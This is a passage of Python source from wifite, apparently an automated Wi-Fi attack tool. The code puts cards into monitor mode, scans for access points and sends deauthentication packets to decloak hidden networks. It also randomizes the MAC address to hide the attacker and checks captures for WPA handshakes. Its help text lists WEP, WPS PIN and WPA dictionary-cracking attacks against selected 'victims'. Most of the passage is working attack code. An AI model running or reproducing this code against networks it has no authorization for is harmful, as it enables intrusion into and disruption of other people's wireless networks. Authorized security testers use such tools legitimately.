exit_gracefully(0)
def get_revision():
"""
Gets latest revision # from google code repository
Returns tuple: revision#, description of change, date changed
"""
irev =-1
desc =''
since=''
try:
sock = urllib.urlopen('http://code.google.com/p/wifite/source/list?path=/trunk/wifite.py')
page = sock.read()
except IOError:
return (-1, '', '')
# get the revision
start= page.find('href="detail?r=')
stop = page.find('&', start)
if start != -1 and stop != -1:
start += 15
rev=page[start:stop]
try:
irev=int(rev)
except ValueError:
rev=rev.split('\n')[0]
print R+'[+] invalid revision number: "'+rev+'"'
# get the description
start= page.find(' href="detail?r='+str(irev)+'', start + 3)
start= page.find('">',start)
stop = page.find('</a>', start)
if start != -1 and stop != -1:
start += 2
desc=page[start:stop].strip()
        desc = desc.replace("&#39;", "'")
        desc = desc.replace("&lt;", "<")
        desc = desc.replace("&gt;", ">")
if '\n' in desc:
desc = desc.split('\n')[0]
# get the time last modified
start= page.find(' href="detail?r='+str(irev)+'', start + 3)
start= page.find('">',start)
stop = page.find('</a>', start)
if start != -1 and stop != -1:
start += 2
since=page[start:stop]
return (irev, desc, since)
def help():
"""
Prints help screen
"""
head = W
sw = G
var = GR
des = W
de = G
print head+' COMMANDS'+W
print sw+'\t-check '+var+'<file>\t'+des+'check capfile '+var+'<file>'+des+' for handshakes.'+W
print sw+'\t-cracked \t'+des+'display previously-cracked access points'+W
print ''
print head+' GLOBAL'+W
print sw+'\t-all \t'+des+'attack all targets. '+de+'[off]'+W
print sw+'\t-i '+var+'<iface> \t'+des+'wireless interface for capturing '+de+'[auto]'+W
print sw+'\t-mac \t'+des+'anonymize mac address '+de+'[off]'+W
print sw+'\t-c '+var+'<channel>\t'+des+'channel to scan for targets '+de+'[auto]'+W
print sw+'\t-e '+var+'<essid> \t'+des+'target a specific access point by ssid (name) '+de+'[ask]'+W
print sw+'\t-b '+var+'<bssid> \t'+des+'target a specific access point by bssid (mac) '+de+'[auto]'+W
print sw+'\t-showb \t'+des+'display target BSSIDs after scan '+de+'[off]'+W
    print sw+'\t-pow '+var+'<db> \t'+des+'attacks any targets with signal strength > '+var+'db '+de+'[0]'+W
print sw+'\t-quiet \t'+des+'do not print list of APs during scan '+de+'[off]'+W
print ''
print head+'\n WPA'+W
print sw+'\t-wpa \t'+des+'only target WPA networks (works with -wps -wep) '+de+'[off]'+W
print sw+'\t-wpat '+var+'<sec> \t'+des+'time to wait for WPA attack to complete (seconds) '+de+'[500]'+W
print sw+'\t-wpadt '+var+'<sec> \t'+des+'time to wait between sending deauth packets (sec) '+de+'[10]'+W
print sw+'\t-strip \t'+des+'strip handshake using tshark or pyrit '+de+'[off]'+W
print sw+'\t-crack '+var+'<dic>\t'+des+'crack WPA handshakes using '+var+'<dic>'+des+' wordlist file '+de+'[off]'+W
print sw+'\t-dict '+var+'<file>\t'+des+'specify dictionary to use when cracking WPA '+de+'[phpbb.txt]'+W
print sw+'\t-aircrack \t'+des+'verify handshake using aircrack '+de+'[on]'+W
print sw+'\t-pyrit \t'+des+'verify handshake using pyrit '+de+'[off]'+W
print sw+'\t-tshark \t'+des+'verify handshake using tshark '+de+'[on]'+W
print sw+'\t-cowpatty \t'+des+'verify handshake using cowpatty '+de+'[off]'+W
print head+'\n WEP'+W
print sw+'\t-wep \t'+des+'only target WEP networks '+de+'[off]'+W
print sw+'\t-pps '+var+'<num> \t'+des+'set the number of packets per second to inject '+de+'[600]'+W
print sw+'\t-wept '+var+'<sec> \t'+des+'sec to wait for each attack, 0 implies endless '+de+'[600]'+W
print sw+'\t-chopchop \t'+des+'use chopchop attack '+de+'[on]'+W
print sw+'\t-arpreplay \t'+des+'use arpreplay attack '+de+'[on]'+W
print sw+'\t-fragment \t'+des+'use fragmentation attack '+de+'[on]'+W
print sw+'\t-caffelatte \t'+des+'use caffe-latte attack '+de+'[on]'+W
print sw+'\t-p0841 \t'+des+'use -p0841 attack '+de+'[on]'+W
print sw+'\t-hirte \t'+des+'use hirte (cfrag) attack '+de+'[on]'+W
print sw+'\t-nofakeauth \t'+des+'stop attack if fake authentication fails '+de+'[off]'+W
print sw+'\t-wepca '+GR+'<n> \t'+des+'start cracking when number of ivs surpass n '+de+'[10000]'+W
print sw+'\t-wepsave \t'+des+'save a copy of .cap files to this directory '+de+'[off]'+W
print head+'\n WPS'+W
print sw+'\t-wps \t'+des+'only target WPS networks '+de+'[off]'+W
print sw+'\t-wpst '+var+'<sec> \t'+des+'max wait for new retry before giving up (0: never) '+de+'[660]'+W
print sw+'\t-wpsratio '+var+'<per>\t'+des+'min ratio of successful PIN attempts/total tries '+de+'[0]'+W
print sw+'\t-wpsretry '+var+'<num>\t'+des+'max number of retries for same PIN before giving up '+de+'[0]'+W
print head+'\n EXAMPLE'+W
print sw+'\t./wifite.py '+W+'-wps -wep -c 6 -pps 600'+W
print ''
###########################
# WIRELESS CARD FUNCTIONS #
###########################
def enable_monitor_mode(iface):
"""
Uses airmon-ng to put a device into Monitor Mode.
Then uses the get_iface() method to retrieve the new interface's name.
Sets global variable IFACE_TO_TAKE_DOWN as well.
Returns the name of the interface in monitor mode.
"""
global IFACE_TO_TAKE_DOWN
print GR+' [+]'+W+' enabling monitor mode on %s...' % (G+iface+W),
stdout.flush()
call(['airmon-ng', 'start', iface], stdout=DN, stderr=DN)
print 'done'
IFACE_TO_TAKE_DOWN = get_iface()
return IFACE_TO_TAKE_DOWN
def disable_monitor_mode():
"""
    Disables monitor mode on the interface we enabled it on (if any).
    Called before exiting so the wireless card is restored to its original state.
"""
if IFACE_TO_TAKE_DOWN == '': return
print GR+' [+]'+W+' disabling monitor mode on %s...' % (G+IFACE_TO_TAKE_DOWN+W),
stdout.flush()
call(['airmon-ng', 'stop', IFACE_TO_TAKE_DOWN], stdout=DN, stderr=DN)
print 'done'
PRINTED_SCANNING = False
def get_iface():
"""
Get the wireless interface in monitor mode.
Defaults to only device in monitor mode if found.
Otherwise, enumerates list of possible wifi devices
and asks user to select one to put into monitor mode (if multiple).
Uses airmon-ng to put device in monitor mode if needed.
Returns the name (string) of the interface chosen in monitor mode.
"""
global PRINTED_SCANNING
if not PRINTED_SCANNING:
print GR+' [+]'+W+' scanning for wireless devices...'
PRINTED_SCANNING = True
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
iface = ''
monitors = []
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue
if ord(line[0]) != 32: # Doesn't start with space
iface = line[:line.find(' ')] # is the interface
if line.find('Mode:Monitor') != -1:
monitors.append(iface)
if WIRELESS_IFACE != '':
if monitors.count(WIRELESS_IFACE): return WIRELESS_IFACE
print R+' [!]'+O+' could not find wireless interface %s' % ('"'+R+WIRELESS_IFACE+O+'"'+W)
if len(monitors) == 1:
return monitors[0] # Default to only device in monitor mode
elif len(monitors) > 1:
print GR+" [+]"+W+" interfaces in "+G+"monitor mode:"+W
for i, monitor in enumerate(monitors):
print " %s. %s" % (G+str(i+1)+W, G+monitor+W)
ri = raw_input("%s [+]%s select %snumber%s of interface to use for capturing (%s1-%d%s): %s" % \
(GR, W, G, W, G, len(monitors), W, G))
while not ri.isdigit() or int(ri) < 1 or int(ri) > len(monitors):
ri = raw_input("%s [+]%s select number of interface to use for capturing (%s1-%d%s): %s" % \
(GR, W, G, len(monitors), W, G))
i = int(ri)
return monitors[i - 1]
proc = Popen(['airmon-ng'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if len(line) == 0 or line.startswith('Interface'): continue
#monitors.append(line[:line.find('\t')])
monitors.append(line)
if len(monitors) == 0:
print R+' [!]'+O+" no wireless interfaces were found."+W
print R+' [!]'+O+" you need to plug in a wifi device or install drivers.\n"+W
exit_gracefully(0)
    elif WIRELESS_IFACE != '' and monitors.count(WIRELESS_IFACE) > 0:
        monitor = WIRELESS_IFACE
        mac_anonymize(monitor)
        return enable_monitor_mode(monitor)
elif len(monitors) == 1:
monitor = monitors[0][:monitors[0].find('\t')]
mac_anonymize(monitor)
return enable_monitor_mode(monitor)
print GR+" [+]"+W+" available wireless devices:"
for i, monitor in enumerate(monitors):
print " %s%d%s. %s" % (G, i + 1, W, monitor)
ri = raw_input(GR+" [+]"+W+" select number of device to put into monitor mode (%s1-%d%s): " % (G, len(monitors), W))
while not ri.isdigit() or int(ri) < 1 or int(ri) > len(monitors):
ri = raw_input(" [+] select number of device to put into monitor mode (%s1-%d%s): " % (G, len(monitors), W))
i = int(ri)
monitor = monitors[i-1][:monitors[i-1].find('\t')]
mac_anonymize(monitor)
return enable_monitor_mode(monitor)
######################
# SCANNING FUNCTIONS #
######################
def scan(channel=0, iface='', tried_rtl8187_fix=False):
"""
Scans for access points. Asks user to select target(s).
"channel" - the channel to scan on, 0 scans all channels.
"iface" - the interface to scan on. must be a real interface.
"tried_rtl8187_fix" - We have already attempted to fix "Unknown error 132"
Returns list of selected targets and list of clients.
"""
remove_airodump_files(temp + 'wifite')
command = ['airodump-ng',
'-a', # only show associated clients
'-w', temp + 'wifite'] # output file
if channel != 0:
command.append('-c')
command.append(str(channel))
command.append(iface)
proc = Popen(command, stdout=DN, stderr=DN)
time_started = time.time()
print GR+' [+] '+G+'initializing scan'+W+' ('+G+iface+W+'), updates at 5 sec intervals, '+G+'CTRL+C'+W+' when ready.'
(targets, clients) = ([], [])
try:
deauth_sent = 0.0
old_targets = []
stop_scanning = False
while True:
time.sleep(0.3)
if not os.path.exists(temp + 'wifite-01.csv') and time.time() - time_started > 1.0:
print R+'\n [!] ERROR!'+W
# RTL8187 Unknown Error 132 FIX
if proc.poll() != None: # Check if process has finished
proc = Popen(['airodump-ng', iface], stdout=DN, stderr=PIPE)
if not tried_rtl8187_fix and proc.communicate()[1].find('failed: Unknown error 132') != -1:
if rtl8187_fix(iface):
return scan(channel=channel, iface=iface, tried_rtl8187_fix=True)
print R+' [!]'+O+' wifite is unable to generate airodump-ng output files'+W
print R+' [!]'+O+' you may want to disconnect/reconnect your wifi device'+W
exit_gracefully(1)
(targets, clients) = parse_csv(temp + 'wifite-01.csv')
# If we are targeting a specific ESSID/BSSID, skip the scan once we find it.
if TARGET_ESSID != '':
for t in targets:
if t.ssid.lower() == TARGET_ESSID.lower():
send_interrupt(proc)
try: os.kill(proc.pid, SIGTERM)
except OSError: pass
except UnboundLocalError: pass
targets = [t]
stop_scanning = True
break
if TARGET_BSSID != '':
for t in targets:
if t.bssid.lower() == TARGET_BSSID.lower():
send_interrupt(proc)
try: os.kill(proc.pid, SIGTERM)
except OSError: pass
except UnboundLocalError: pass
targets = [t]
stop_scanning = True
break
            # If user has chosen to target all access points, wait 10 seconds, then return all
if ATTACK_ALL_TARGETS and time.time() - time_started > 10:
print GR+'\n [+]'+W+' auto-targeted %s%d%s access point%s' % (G, len(targets), W, '' if len(targets) == 1 else 's')
stop_scanning = True
if ATTACK_MIN_POWER > 0 and time.time() - time_started > 10:
# Remove targets with power < threshold
i = 0
before_count = len(targets)
while i < len(targets):
if targets[i].power < ATTACK_MIN_POWER:
targets.pop(i)
else: i += 1
print GR+'\n [+]'+W+' removed %s targets with power < %ddB, %s remain' % \
(G+str(before_count - len(targets))+W, ATTACK_MIN_POWER, G+str(len(targets))+W)
stop_scanning = True
if stop_scanning: break
# If there are unknown SSIDs, send deauths to them.
if channel != 0 and time.time() - deauth_sent > 5:
deauth_sent = time.time()
for t in targets:
if t.ssid == '':
print "\r %s deauthing hidden access point (%s) \r" % \
(GR+sec_to_hms(time.time() - time_started)+W, G+t.bssid+W),
stdout.flush()
# Time to deauth
cmd = ['aireplay-ng',
'--deauth', '1',
'-a', t.bssid]
for c in clients:
if c.station == t.bssid:
cmd.append('-c')
cmd.append(c.bssid)
break
cmd.append(iface)
proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)
proc_aireplay.wait()
time.sleep(0.5)
else:
for ot in old_targets:
if ot.ssid == '' and ot.bssid == t.bssid:
print '\r %s successfully decloaked "%s" ' % \
(GR+sec_to_hms(time.time() - time_started)+W, G+t.ssid+W)
old_targets = targets[:]
if VERBOSE_APS and len(targets) > 0:
targets = sorted(targets, key=lambda t: t.power, reverse=True)
if not WPS_DISABLE:
wps_check_targets(targets, temp + 'wifite-01.cap', verbose=False)
os.system('clear')
print GR+'\n [+] '+G+'scanning'+W+' ('+G+iface+W+'), updates at 5 sec intervals, '+G+'CTRL+C'+W+' when ready.\n'
print " NUM ESSID %sCH ENCR POWER WPS? CLIENT" % ('BSSID ' if SHOW_MAC_IN_SCAN else '')
print ' --- -------------------- %s-- ---- ----- ---- ------' % ('----------------- ' if SHOW_MAC_IN_SCAN else '')
for i, target in enumerate(targets):
print " %s%2d%s " % (G, i + 1, W),
# SSID
if target.ssid == '':
p = O+'('+target.bssid+')'+GR+' '+W
print '%s' % p.ljust(20),
elif ( target.ssid.count('\x00') == len(target.ssid) ):
p = '<Length '+str(len(target.ssid))+'>'
print '%s' % C+p.ljust(20)+W,
elif len(target.ssid) <= 20:
print "%s" % C+target.ssid.ljust(20)+W,
else:
print "%s" % C+target.ssid[0:17] + '...'+W,
# BSSID
if SHOW_MAC_IN_SCAN:
print O,target.bssid+W,
# Channel
print G+target.channel.rjust(3),W,
# Encryption
if target.encryption.find("WEP") != -1: print G,
else: print O,
print "\b%3s" % target.encryption.strip().ljust(4) + W,
# Power
if target.power >= 55: col = G
elif target.power >= 40: col = O
else: col = R
print "%s%3ddb%s" % (col,target.power, W),
# WPS
if WPS_DISABLE:
print " %3s" % (O+'n/a'+W),
else:
print " %3s" % (G+'wps'+W if target.wps else R+' no'+W),
# Clients
client_text = ''
for c in clients:
if c.station == target.bssid:
if client_text == '': client_text = 'client'
elif client_text[-1] != "s": client_text += "s"
if client_text != '': print ' %s' % (G+client_text+W)
else: print ''
print ''
print ' %s %s wireless networks. %s target%s and %s client%s found \r' % (
GR+sec_to_hms(time.time() - time_started)+W, G+'scanning'+W,
G+str(len(targets))+W, '' if len(targets) == 1 else 's',
G+str(len(clients))+W, '' if len(clients) == 1 else 's'),
stdout.flush()
except KeyboardInterrupt:
pass
print ''
send_interrupt(proc)
try: os.kill(proc.pid, SIGTERM)
except OSError: pass
except UnboundLocalError: pass
# Use "wash" program to check for WPS compatibility
if not WPS_DISABLE:
wps_check_targets(targets, temp + 'wifite-01.cap')
remove_airodump_files(temp + 'wifite')
if stop_scanning: return (targets, clients)
print ''
if len(targets) == 0:
print R+' [!]'+O+' no targets found!'+W
print R+' [!]'+O+' you may need to wait for targets to show up.'+W
print ''
exit_gracefully(1)
if VERBOSE_APS: os.system('clear')
# Sort by Power
targets = sorted(targets, key=lambda t: t.power, reverse=True)
victims = []
print " NUM ESSID %sCH ENCR POWER WPS? CLIENT" % ('BSSID ' if SHOW_MAC_IN_SCAN else '')
print ' --- -------------------- %s-- ---- ----- ---- ------' % ('----------------- ' if SHOW_MAC_IN_SCAN else '')
for i, target in enumerate(targets):
print " %s%2d%s " % (G, i + 1, W),
# SSID
if target.ssid == '':
p = O+'('+target.bssid+')'+GR+' '+W
print '%s' % p.ljust(20),
elif ( target.ssid.count('\x00') == len(target.ssid) ):
p = '<Length '+str(len(target.ssid))+'>'
print '%s' % C+p.ljust(20)+W,
elif len(target.ssid) <= 20:
print "%s" % C+target.ssid.ljust(20)+W,
else:
print "%s" % C+target.ssid[0:17] + '...'+W,
# BSSID
if SHOW_MAC_IN_SCAN:
print O,target.bssid+W,
# Channel
print G+target.channel.rjust(3),W,
# Encryption
if target.encryption.find("WEP") != -1: print G,
else: print O,
print "\b%3s" % target.encryption.strip().ljust(4) + W,
# Power
if target.power >= 55: col = G
elif target.power >= 40: col = O
else: col = R
print "%s%3ddb%s" % (col,target.power, W),
# WPS
if WPS_DISABLE:
print " %3s" % (O+'n/a'+W),
else:
print " %3s" % (G+'wps'+W if target.wps else R+' no'+W),
# Clients
client_text = ''
for c in clients:
if c.station == target.bssid:
if client_text == '': client_text = 'client'
elif client_text[-1] != "s": client_text += "s"
if client_text != '': print ' %s' % (G+client_text+W)
else: print ''
ri = raw_input(GR+"\n [+]"+W+" select "+G+"target numbers"+W+" ("+G+"1-%s)" % (str(len(targets))+W) + \
" separated by commas, or '%s': " % (G+'all'+W))
if ri.strip().lower() == 'all':
victims = targets[:]
else:
for r in ri.split(','):
r = r.strip()
if r.find('-') != -1:
(sx, sy) = r.split('-')
if sx.isdigit() and sy.isdigit():
x = int(sx)
y = int(sy) + 1
for v in xrange(x, y):
victims.append(targets[v - 1])
elif not r.isdigit() and r.strip() != '':
print O+" [!]"+R+" not a number: %s " % (O+r+W)
elif r != '':
victims.append(targets[int(r) - 1])
if len(victims) == 0:
print O+'\n [!] '+R+'no targets selected.\n'+W
exit_gracefully(0)
print ''
print ' [+] %s%d%s target%s selected.' % (G, len(victims), W, '' if len(victims) == 1 else 's')
return (victims, clients)
def parse_csv(filename):
"""
Parses given lines from airodump-ng CSV file.
Returns tuple: List of targets and list of clients.
"""
if not os.path.exists(filename): return ([], [])
try:
f = open(filename, 'r')
lines = f.read().split('\n')
f.close()
except IOError: return ([], [])
hit_clients = False
targets = []
clients = []
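    # Typical airodump-ng CSV access-point row (the columns this parser relies on):
    #   BSSID, First seen, Last seen, channel, Speed, Privacy, Cipher, Auth,
    #   Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
    # The 'cur' index below skips the LAN IP column when it is non-numeric.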
for line in lines:
if line.startswith('Station MAC,'): hit_clients = True
if line.startswith('BSSID') or line.startswith('Station MAC') or line.strip() == '': continue
if not hit_clients: # Access points
c = line.split(', ', 13)
if len(c) <= 11: continue
cur = 11
c[cur] = c[cur].strip()
if not c[cur].isdigit(): cur += 1
if cur > len(c) - 1: continue
ssid = c[cur+1]
ssidlen = int(c[cur])
ssid = ssid[:ssidlen]
power = int(c[cur-4])
if power < 0: power += 100
enc = c[5]
# Ignore non-WPA/WEP networks.
if enc.find('WPA') == -1 and enc.find('WEP') == -1: continue
if WEP_DISABLE and enc.find('WEP') != -1: continue
if WPA_DISABLE and WPS_DISABLE and enc.find('WPA') != -1: continue
enc = enc.strip()[:4]
t = Target(c[0], power, c[cur-2].strip(), c[3], enc, ssid)
targets.append(t)
else: # Connected clients
c = line.split(', ')
if len(c) < 6: continue
bssid = re.sub(r'[^a-zA-Z0-9:]', '', c[0])
station = re.sub(r'[^a-zA-Z0-9:]', '', c[5])
power = c[3]
if station != 'notassociated':
c = Client(bssid, station, power)
clients.append(c)
return (targets, clients)
def wps_check_targets(targets, cap_file, verbose=True):
"""
Uses reaver's "walsh" (or wash) program to check access points in cap_file
for WPS functionality. Sets "wps" field of targets that match to True.
"""
global WPS_DISABLE
if not program_exists('walsh') and not program_exists('wash'):
WPS_DISABLE = True # Tell 'scan' we were unable to execute walsh
return
program_name = 'walsh' if program_exists('walsh') else 'wash'
if len(targets) == 0 or not os.path.exists(cap_file): return
if verbose:
print GR+' [+]'+W+' checking for '+G+'WPS compatibility'+W+'...',
stdout.flush()
cmd = [program_name,
'-f', cap_file,
'-C'] # ignore Frame Check Sum errors
proc_walsh = Popen(cmd, stdout=PIPE, stderr=DN)
proc_walsh.wait()
for line in proc_walsh.communicate()[0].split('\n'):
if line.strip() == '' or line.startswith('Scanning for'): continue
bssid = line.split(' ')[0]
for t in targets:
if t.bssid.lower() == bssid.lower():
t.wps = True
if verbose:
print 'done'
removed = 0
if not WPS_DISABLE and WPA_DISABLE:
i = 0
while i < len(targets):
if not targets[i].wps and targets[i].encryption.find('WPA') != -1:
removed += 1
targets.pop(i)
else: i += 1
if removed > 0 and verbose: print GR+' [+]'+O+' removed %d non-WPS-enabled targets%s' % (removed, W)
def rtl8187_fix(iface):
"""
Attempts to solve "Unknown error 132" common with RTL8187 devices.
Puts down interface, unloads/reloads driver module, then puts iface back up.
Returns True if fix was attempted, False otherwise.
"""
# Check if current interface is using the RTL8187 chipset
proc_airmon = Popen(['airmon-ng'], stdout=PIPE, stderr=DN)
proc_airmon.wait()
using_rtl8187 = False
for line in proc_airmon.communicate()[0].split():
line = line.upper()
if line.strip() == '' or line.startswith('INTERFACE'): continue
        if line.find(iface.upper()) != -1 and line.find('RTL8187') != -1: using_rtl8187 = True
if not using_rtl8187:
# Display error message and exit
print R+' [!]'+O+' unable to generate airodump-ng CSV file'+W
print R+' [!]'+O+' you may want to disconnect/reconnect your wifi device'+W
exit_gracefully(1)
print O+" [!]"+W+" attempting "+O+"RTL8187 'Unknown Error 132'"+W+" fix..."
original_iface = iface
# Take device out of monitor mode
airmon = Popen(['airmon-ng', 'stop', iface], stdout=PIPE, stderr=DN)
airmon.wait()
for line in airmon.communicate()[0].split('\n'):
if line.strip() == '' or \
line.startswith("Interface") or \
line.find('(removed)') != -1:
continue
original_iface = line.split()[0] # line[:line.find('\t')]
# Remove drive modules, block/unblock ifaces, probe new modules.
print_and_exec(['ifconfig', original_iface, 'down'])
print_and_exec(['rmmod', 'rtl8187'])
print_and_exec(['rfkill', 'block', 'all'])
print_and_exec(['rfkill', 'unblock', 'all'])
print_and_exec(['modprobe', 'rtl8187'])
print_and_exec(['ifconfig', original_iface, 'up'])
print_and_exec(['airmon-ng', 'start', original_iface])
print '\r \r',
print O+' [!] '+W+'restarting scan...\n'
return True
def print_and_exec(cmd):
"""
    Prints and executes command "cmd", then pauses briefly (0.1 seconds).
Used by rtl8187_fix (for prettiness)
"""
print '\r \r',
stdout.flush()
print O+' [!] '+W+'executing: '+O+' '.join(cmd) + W,
stdout.flush()
call(cmd, stdout=DN, stderr=DN)
time.sleep(0.1)
####################
# HELPER FUNCTIONS #
####################
def remove_airodump_files(prefix):
"""
Removes airodump output files for whatever file prefix ('wpa', 'wep', etc)
Used by wpa_get_handshake() and attack_wep()
"""
remove_file(prefix + '-01.cap')
remove_file(prefix + '-01.csv')
remove_file(prefix + '-01.kismet.csv')
remove_file(prefix + '-01.kismet.netxml')
for filename in os.listdir(temp):
if filename.lower().endswith('.xor'): remove_file(temp + filename)
for filename in os.listdir('.'):
if filename.startswith('replay_') and filename.endswith('.cap'):
remove_file(filename)
if filename.endswith('.xor'): remove_file(filename)
# Remove .cap's from previous attack sessions
"""i = 2
while os.path.exists(temp + 'wep-' + str(i) + '.cap'):
os.remove(temp + 'wep-' + str(i) + '.cap')
i += 1
"""
def remove_file(filename):
"""
Attempts to remove a file. Does not throw error if file is not found.
"""
try: os.remove(filename)
except OSError: pass
def program_exists(program):
"""
Uses 'which' (linux command) to check if a program is installed.
"""
proc = Popen(['which', program], stdout=PIPE, stderr=PIPE)
txt = proc.communicate()
if txt[0].strip() == '' and txt[1].strip() == '':
return False
if txt[0].strip() != '' and txt[1].strip() == '':
return True
return not (txt[1].strip() == '' or txt[1].find('no %s in' % program) != -1)
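# e.g. program_exists('aircrack-ng') returns True only when `which` can
# resolve the program on the current PATH.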
def sec_to_hms(sec):
"""
Converts integer sec to h:mm:ss format
"""
if sec <= -1: return '[endless]'
h = sec / 3600
sec %= 3600
m = sec / 60
sec %= 60
return '[%d:%02d:%02d]' % (h, m, sec)
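# e.g. sec_to_hms(3661) -> '[1:01:01]'; sec_to_hms(-1) -> '[endless]'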
def send_interrupt(process):
"""
Sends interrupt signal to process's PID.
"""
try:
os.kill(process.pid, SIGINT)
# os.kill(process.pid, SIGTERM)
except OSError: pass # process cannot be killed
except TypeError: pass # pid is incorrect type
except UnboundLocalError: pass # 'process' is not defined
except AttributeError: pass # Trying to kill "None"
def get_mac_address(iface):
"""
Returns MAC address of "iface".
"""
proc = Popen(['ifconfig', iface], stdout=PIPE, stderr=DN)
proc.wait()
mac = ''
first_line = proc.communicate()[0].split('\n')[0]
for word in first_line.split(' '):
if word != '': mac = word
if mac.find('-') != -1: mac = mac.replace('-', ':')
if len(mac) > 17: mac = mac[0:17]
return mac
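# Note: this assumes the classic net-tools `ifconfig` layout, where the first
# output line ends with "HWaddr AA:BB:CC:DD:EE:FF"; the last word on that line
# is taken as the MAC address.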
def generate_random_mac(old_mac):
"""
Generates a random MAC address.
    Keeps the same vendor prefix (first three octets) of the old MAC address (old_mac).
    Returns a string in the format old_mac[0:8] + ':XX:XX:XX' where X is a random hex digit.
"""
random.seed()
new_mac = old_mac[:8].lower().replace('-', ':')
for i in xrange(0, 6):
if i % 2 == 0: new_mac += ':'
new_mac += '0123456789abcdef'[random.randint(0,15)]
# Prevent generating the same MAC address via recursion.
if new_mac == old_mac:
new_mac = generate_random_mac(old_mac)
return new_mac
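# e.g. generate_random_mac('00:11:22:33:44:55') could return '00:11:22:af:03:9c'
# (random last three octets, vendor prefix preserved).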
def mac_anonymize(iface):
"""
Changes MAC address of 'iface' to a random MAC.
    Only randomizes the last 6 hex digits of the MAC, so the vendor prefix stays the same.
Stores old MAC address and the interface in ORIGINAL_IFACE_MAC
"""
global ORIGINAL_IFACE_MAC
if DO_NOT_CHANGE_MAC: return
if not program_exists('ifconfig'): return
# Store old (current) MAC address
proc = Popen(['ifconfig', iface], stdout=PIPE, stderr=DN)
proc.wait()
for word in proc.communicate()[0].split('\n')[0].split(' '):
if word != '': old_mac = word
ORIGINAL_IFACE_MAC = (iface, old_mac)
new_mac = generate_random_mac(old_mac)
call(['ifconfig', iface, 'down'])
print GR+" [+]"+W+" changing %s's MAC from %s to %s..." % (G+iface+W, G+old_mac+W, O+new_mac+W),
stdout.flush()
proc = Popen(['ifconfig', iface, 'hw', 'ether', new_mac], stdout=PIPE, stderr=DN)
proc.wait()
call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
print 'done'
def mac_change_back():
"""
Changes MAC address back to what it was before attacks began.
"""
iface = ORIGINAL_IFACE_MAC[0]
old_mac = ORIGINAL_IFACE_MAC[1]
if iface == '' or old_mac == '': return
print GR+" [+]"+W+" changing %s's mac back to %s..." % (G+iface+W, G+old_mac+W),
stdout.flush()
call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
proc = Popen(['ifconfig', iface, 'hw', 'ether', old_mac], stdout=PIPE, stderr=DN)
proc.wait()
call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
print "done"
def analyze_capfile(capfile):
"""
Analyzes given capfile for handshakes using various programs.
Prints results to console.
"""
global TARGET_BSSID, TARGET_ESSID
if TARGET_ESSID == '' and TARGET_BSSID == '':
print R+' [!]'+O+' target ssid and bssid are required to check for handshakes'
print R+' [!]'+O+' please enter essid (access point name) using -e <name>'
print R+' [!]'+O+' and/or target bssid (mac address) using -b <mac>\n'
# exit_gracefully(1)
if TARGET_BSSID == '':
# Get the first BSSID found in tshark!
TARGET_BSSID = get_bssid_from_cap(TARGET_ESSID, capfile)
# if TARGET_BSSID.find('->') != -1: TARGET_BSSID == ''
if TARGET_BSSID == '':
print R+' [!]'+O+' unable to guess BSSID from ESSID!'
else:
print GR+' [+]'+W+' guessed bssid: %s' % (G+TARGET_BSSID+W)
if TARGET_BSSID != '' and TARGET_ESSID == '':
TARGET_ESSID = get_essid_from_cap(TARGET_BSSID, capfile)
print GR+'\n [+]'+W+' checking for handshakes in %s' % (G+capfile+W)
t = Target(TARGET_BSSID, '', '', '', 'WPA', TARGET_ESSID)
if program_exists('pyrit'):
result = has_handshake_pyrit(t, capfile)
print GR+' [+]'+W+' '+G+'pyrit'+W+':\t\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
else: print R+' [!]'+O+' program not found: pyrit'
if program_exists('cowpatty'):
result = has_handshake_cowpatty(t, capfile, nonstrict=True)
print GR+' [+]'+W+' '+G+'cowpatty'+W+' (nonstrict):\t %s' % (G+'found!'+W if result else O+'not found'+W)
result = has_handshake_cowpatty(t, capfile, nonstrict=False)
print GR+' [+]'+W+' '+G+'cowpatty'+W+' (strict):\t %s' % (G+'found!'+W if result else O+'not found'+W)
else: print R+' [!]'+O+' program not found: cowpatty'
if program_exists('tshark'):
result = has_handshake_tshark(t, capfile)
print GR+' [+]'+W+' '+G+'tshark'+W+':\t\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
else: print R+' [!]'+O+' program not found: tshark'
if program_exists('aircrack-ng'):
result = has_handshake_aircrack(t, capfile)
print GR+' [+]'+W+' '+G+'aircrack-ng'+W+':\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
else: print R+' [!]'+O+' program not found: aircrack-ng'
print ''
exit_gracefully(0)
def get_essid_from_cap(bssid, capfile):
"""
Attempts to get ESSID from cap file using BSSID as reference.
Returns '' if not found.
"""
if not program_exists('tshark'): return ''
cmd = ['tshark',
'-r', capfile,
'-R', 'wlan.fc.type_subtype == 0x05 && wlan.sa == %s' % bssid,
'-n']
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
for line in proc.communicate()[0].split('\n'):
if line.find('SSID=') != -1:
essid = line[line.find('SSID=')+5:]
print GR+' [+]'+W+' guessed essid: %s' % (G+essid+W)
return essid
print R+' [!]'+O+' unable to guess essid!'+W
return ''
def get_bssid_from_cap(essid, capfile):
"""
Returns first BSSID of access point found in cap file.
    This is only a rough guess and may not be accurate.
Returns '' if not found.
"""
global TARGET_ESSID
if not program_exists('tshark'): return ''
# Attempt to get BSSID based on ESSID
if essid != '':
cmd = ['tshark',
'-r', capfile,
'-R', 'wlan_mgt.ssid == "%s" && wlan.fc.type_subtype == 0x05' % (essid),
'-n', # Do not resolve MAC vendor names
'-T', 'fields', # Only display certain fields
               '-e', 'wlan.sa'] # source MAC address
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
bssid = proc.communicate()[0].split('\n')[0]
if bssid != '': return bssid
cmd = ['tshark',
'-r', capfile,
'-R', 'eapol',
'-n']
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
for line in proc.communicate()[0].split('\n'):
if line.endswith('Key (msg 1/4)') or line.endswith('Key (msg 3/4)'):
while line.startswith(' ') or line.startswith('\t'): line = line[1:]
line = line.replace('\t', ' ')
while line.find(' ') != -1: line = line.replace(' ', ' ')
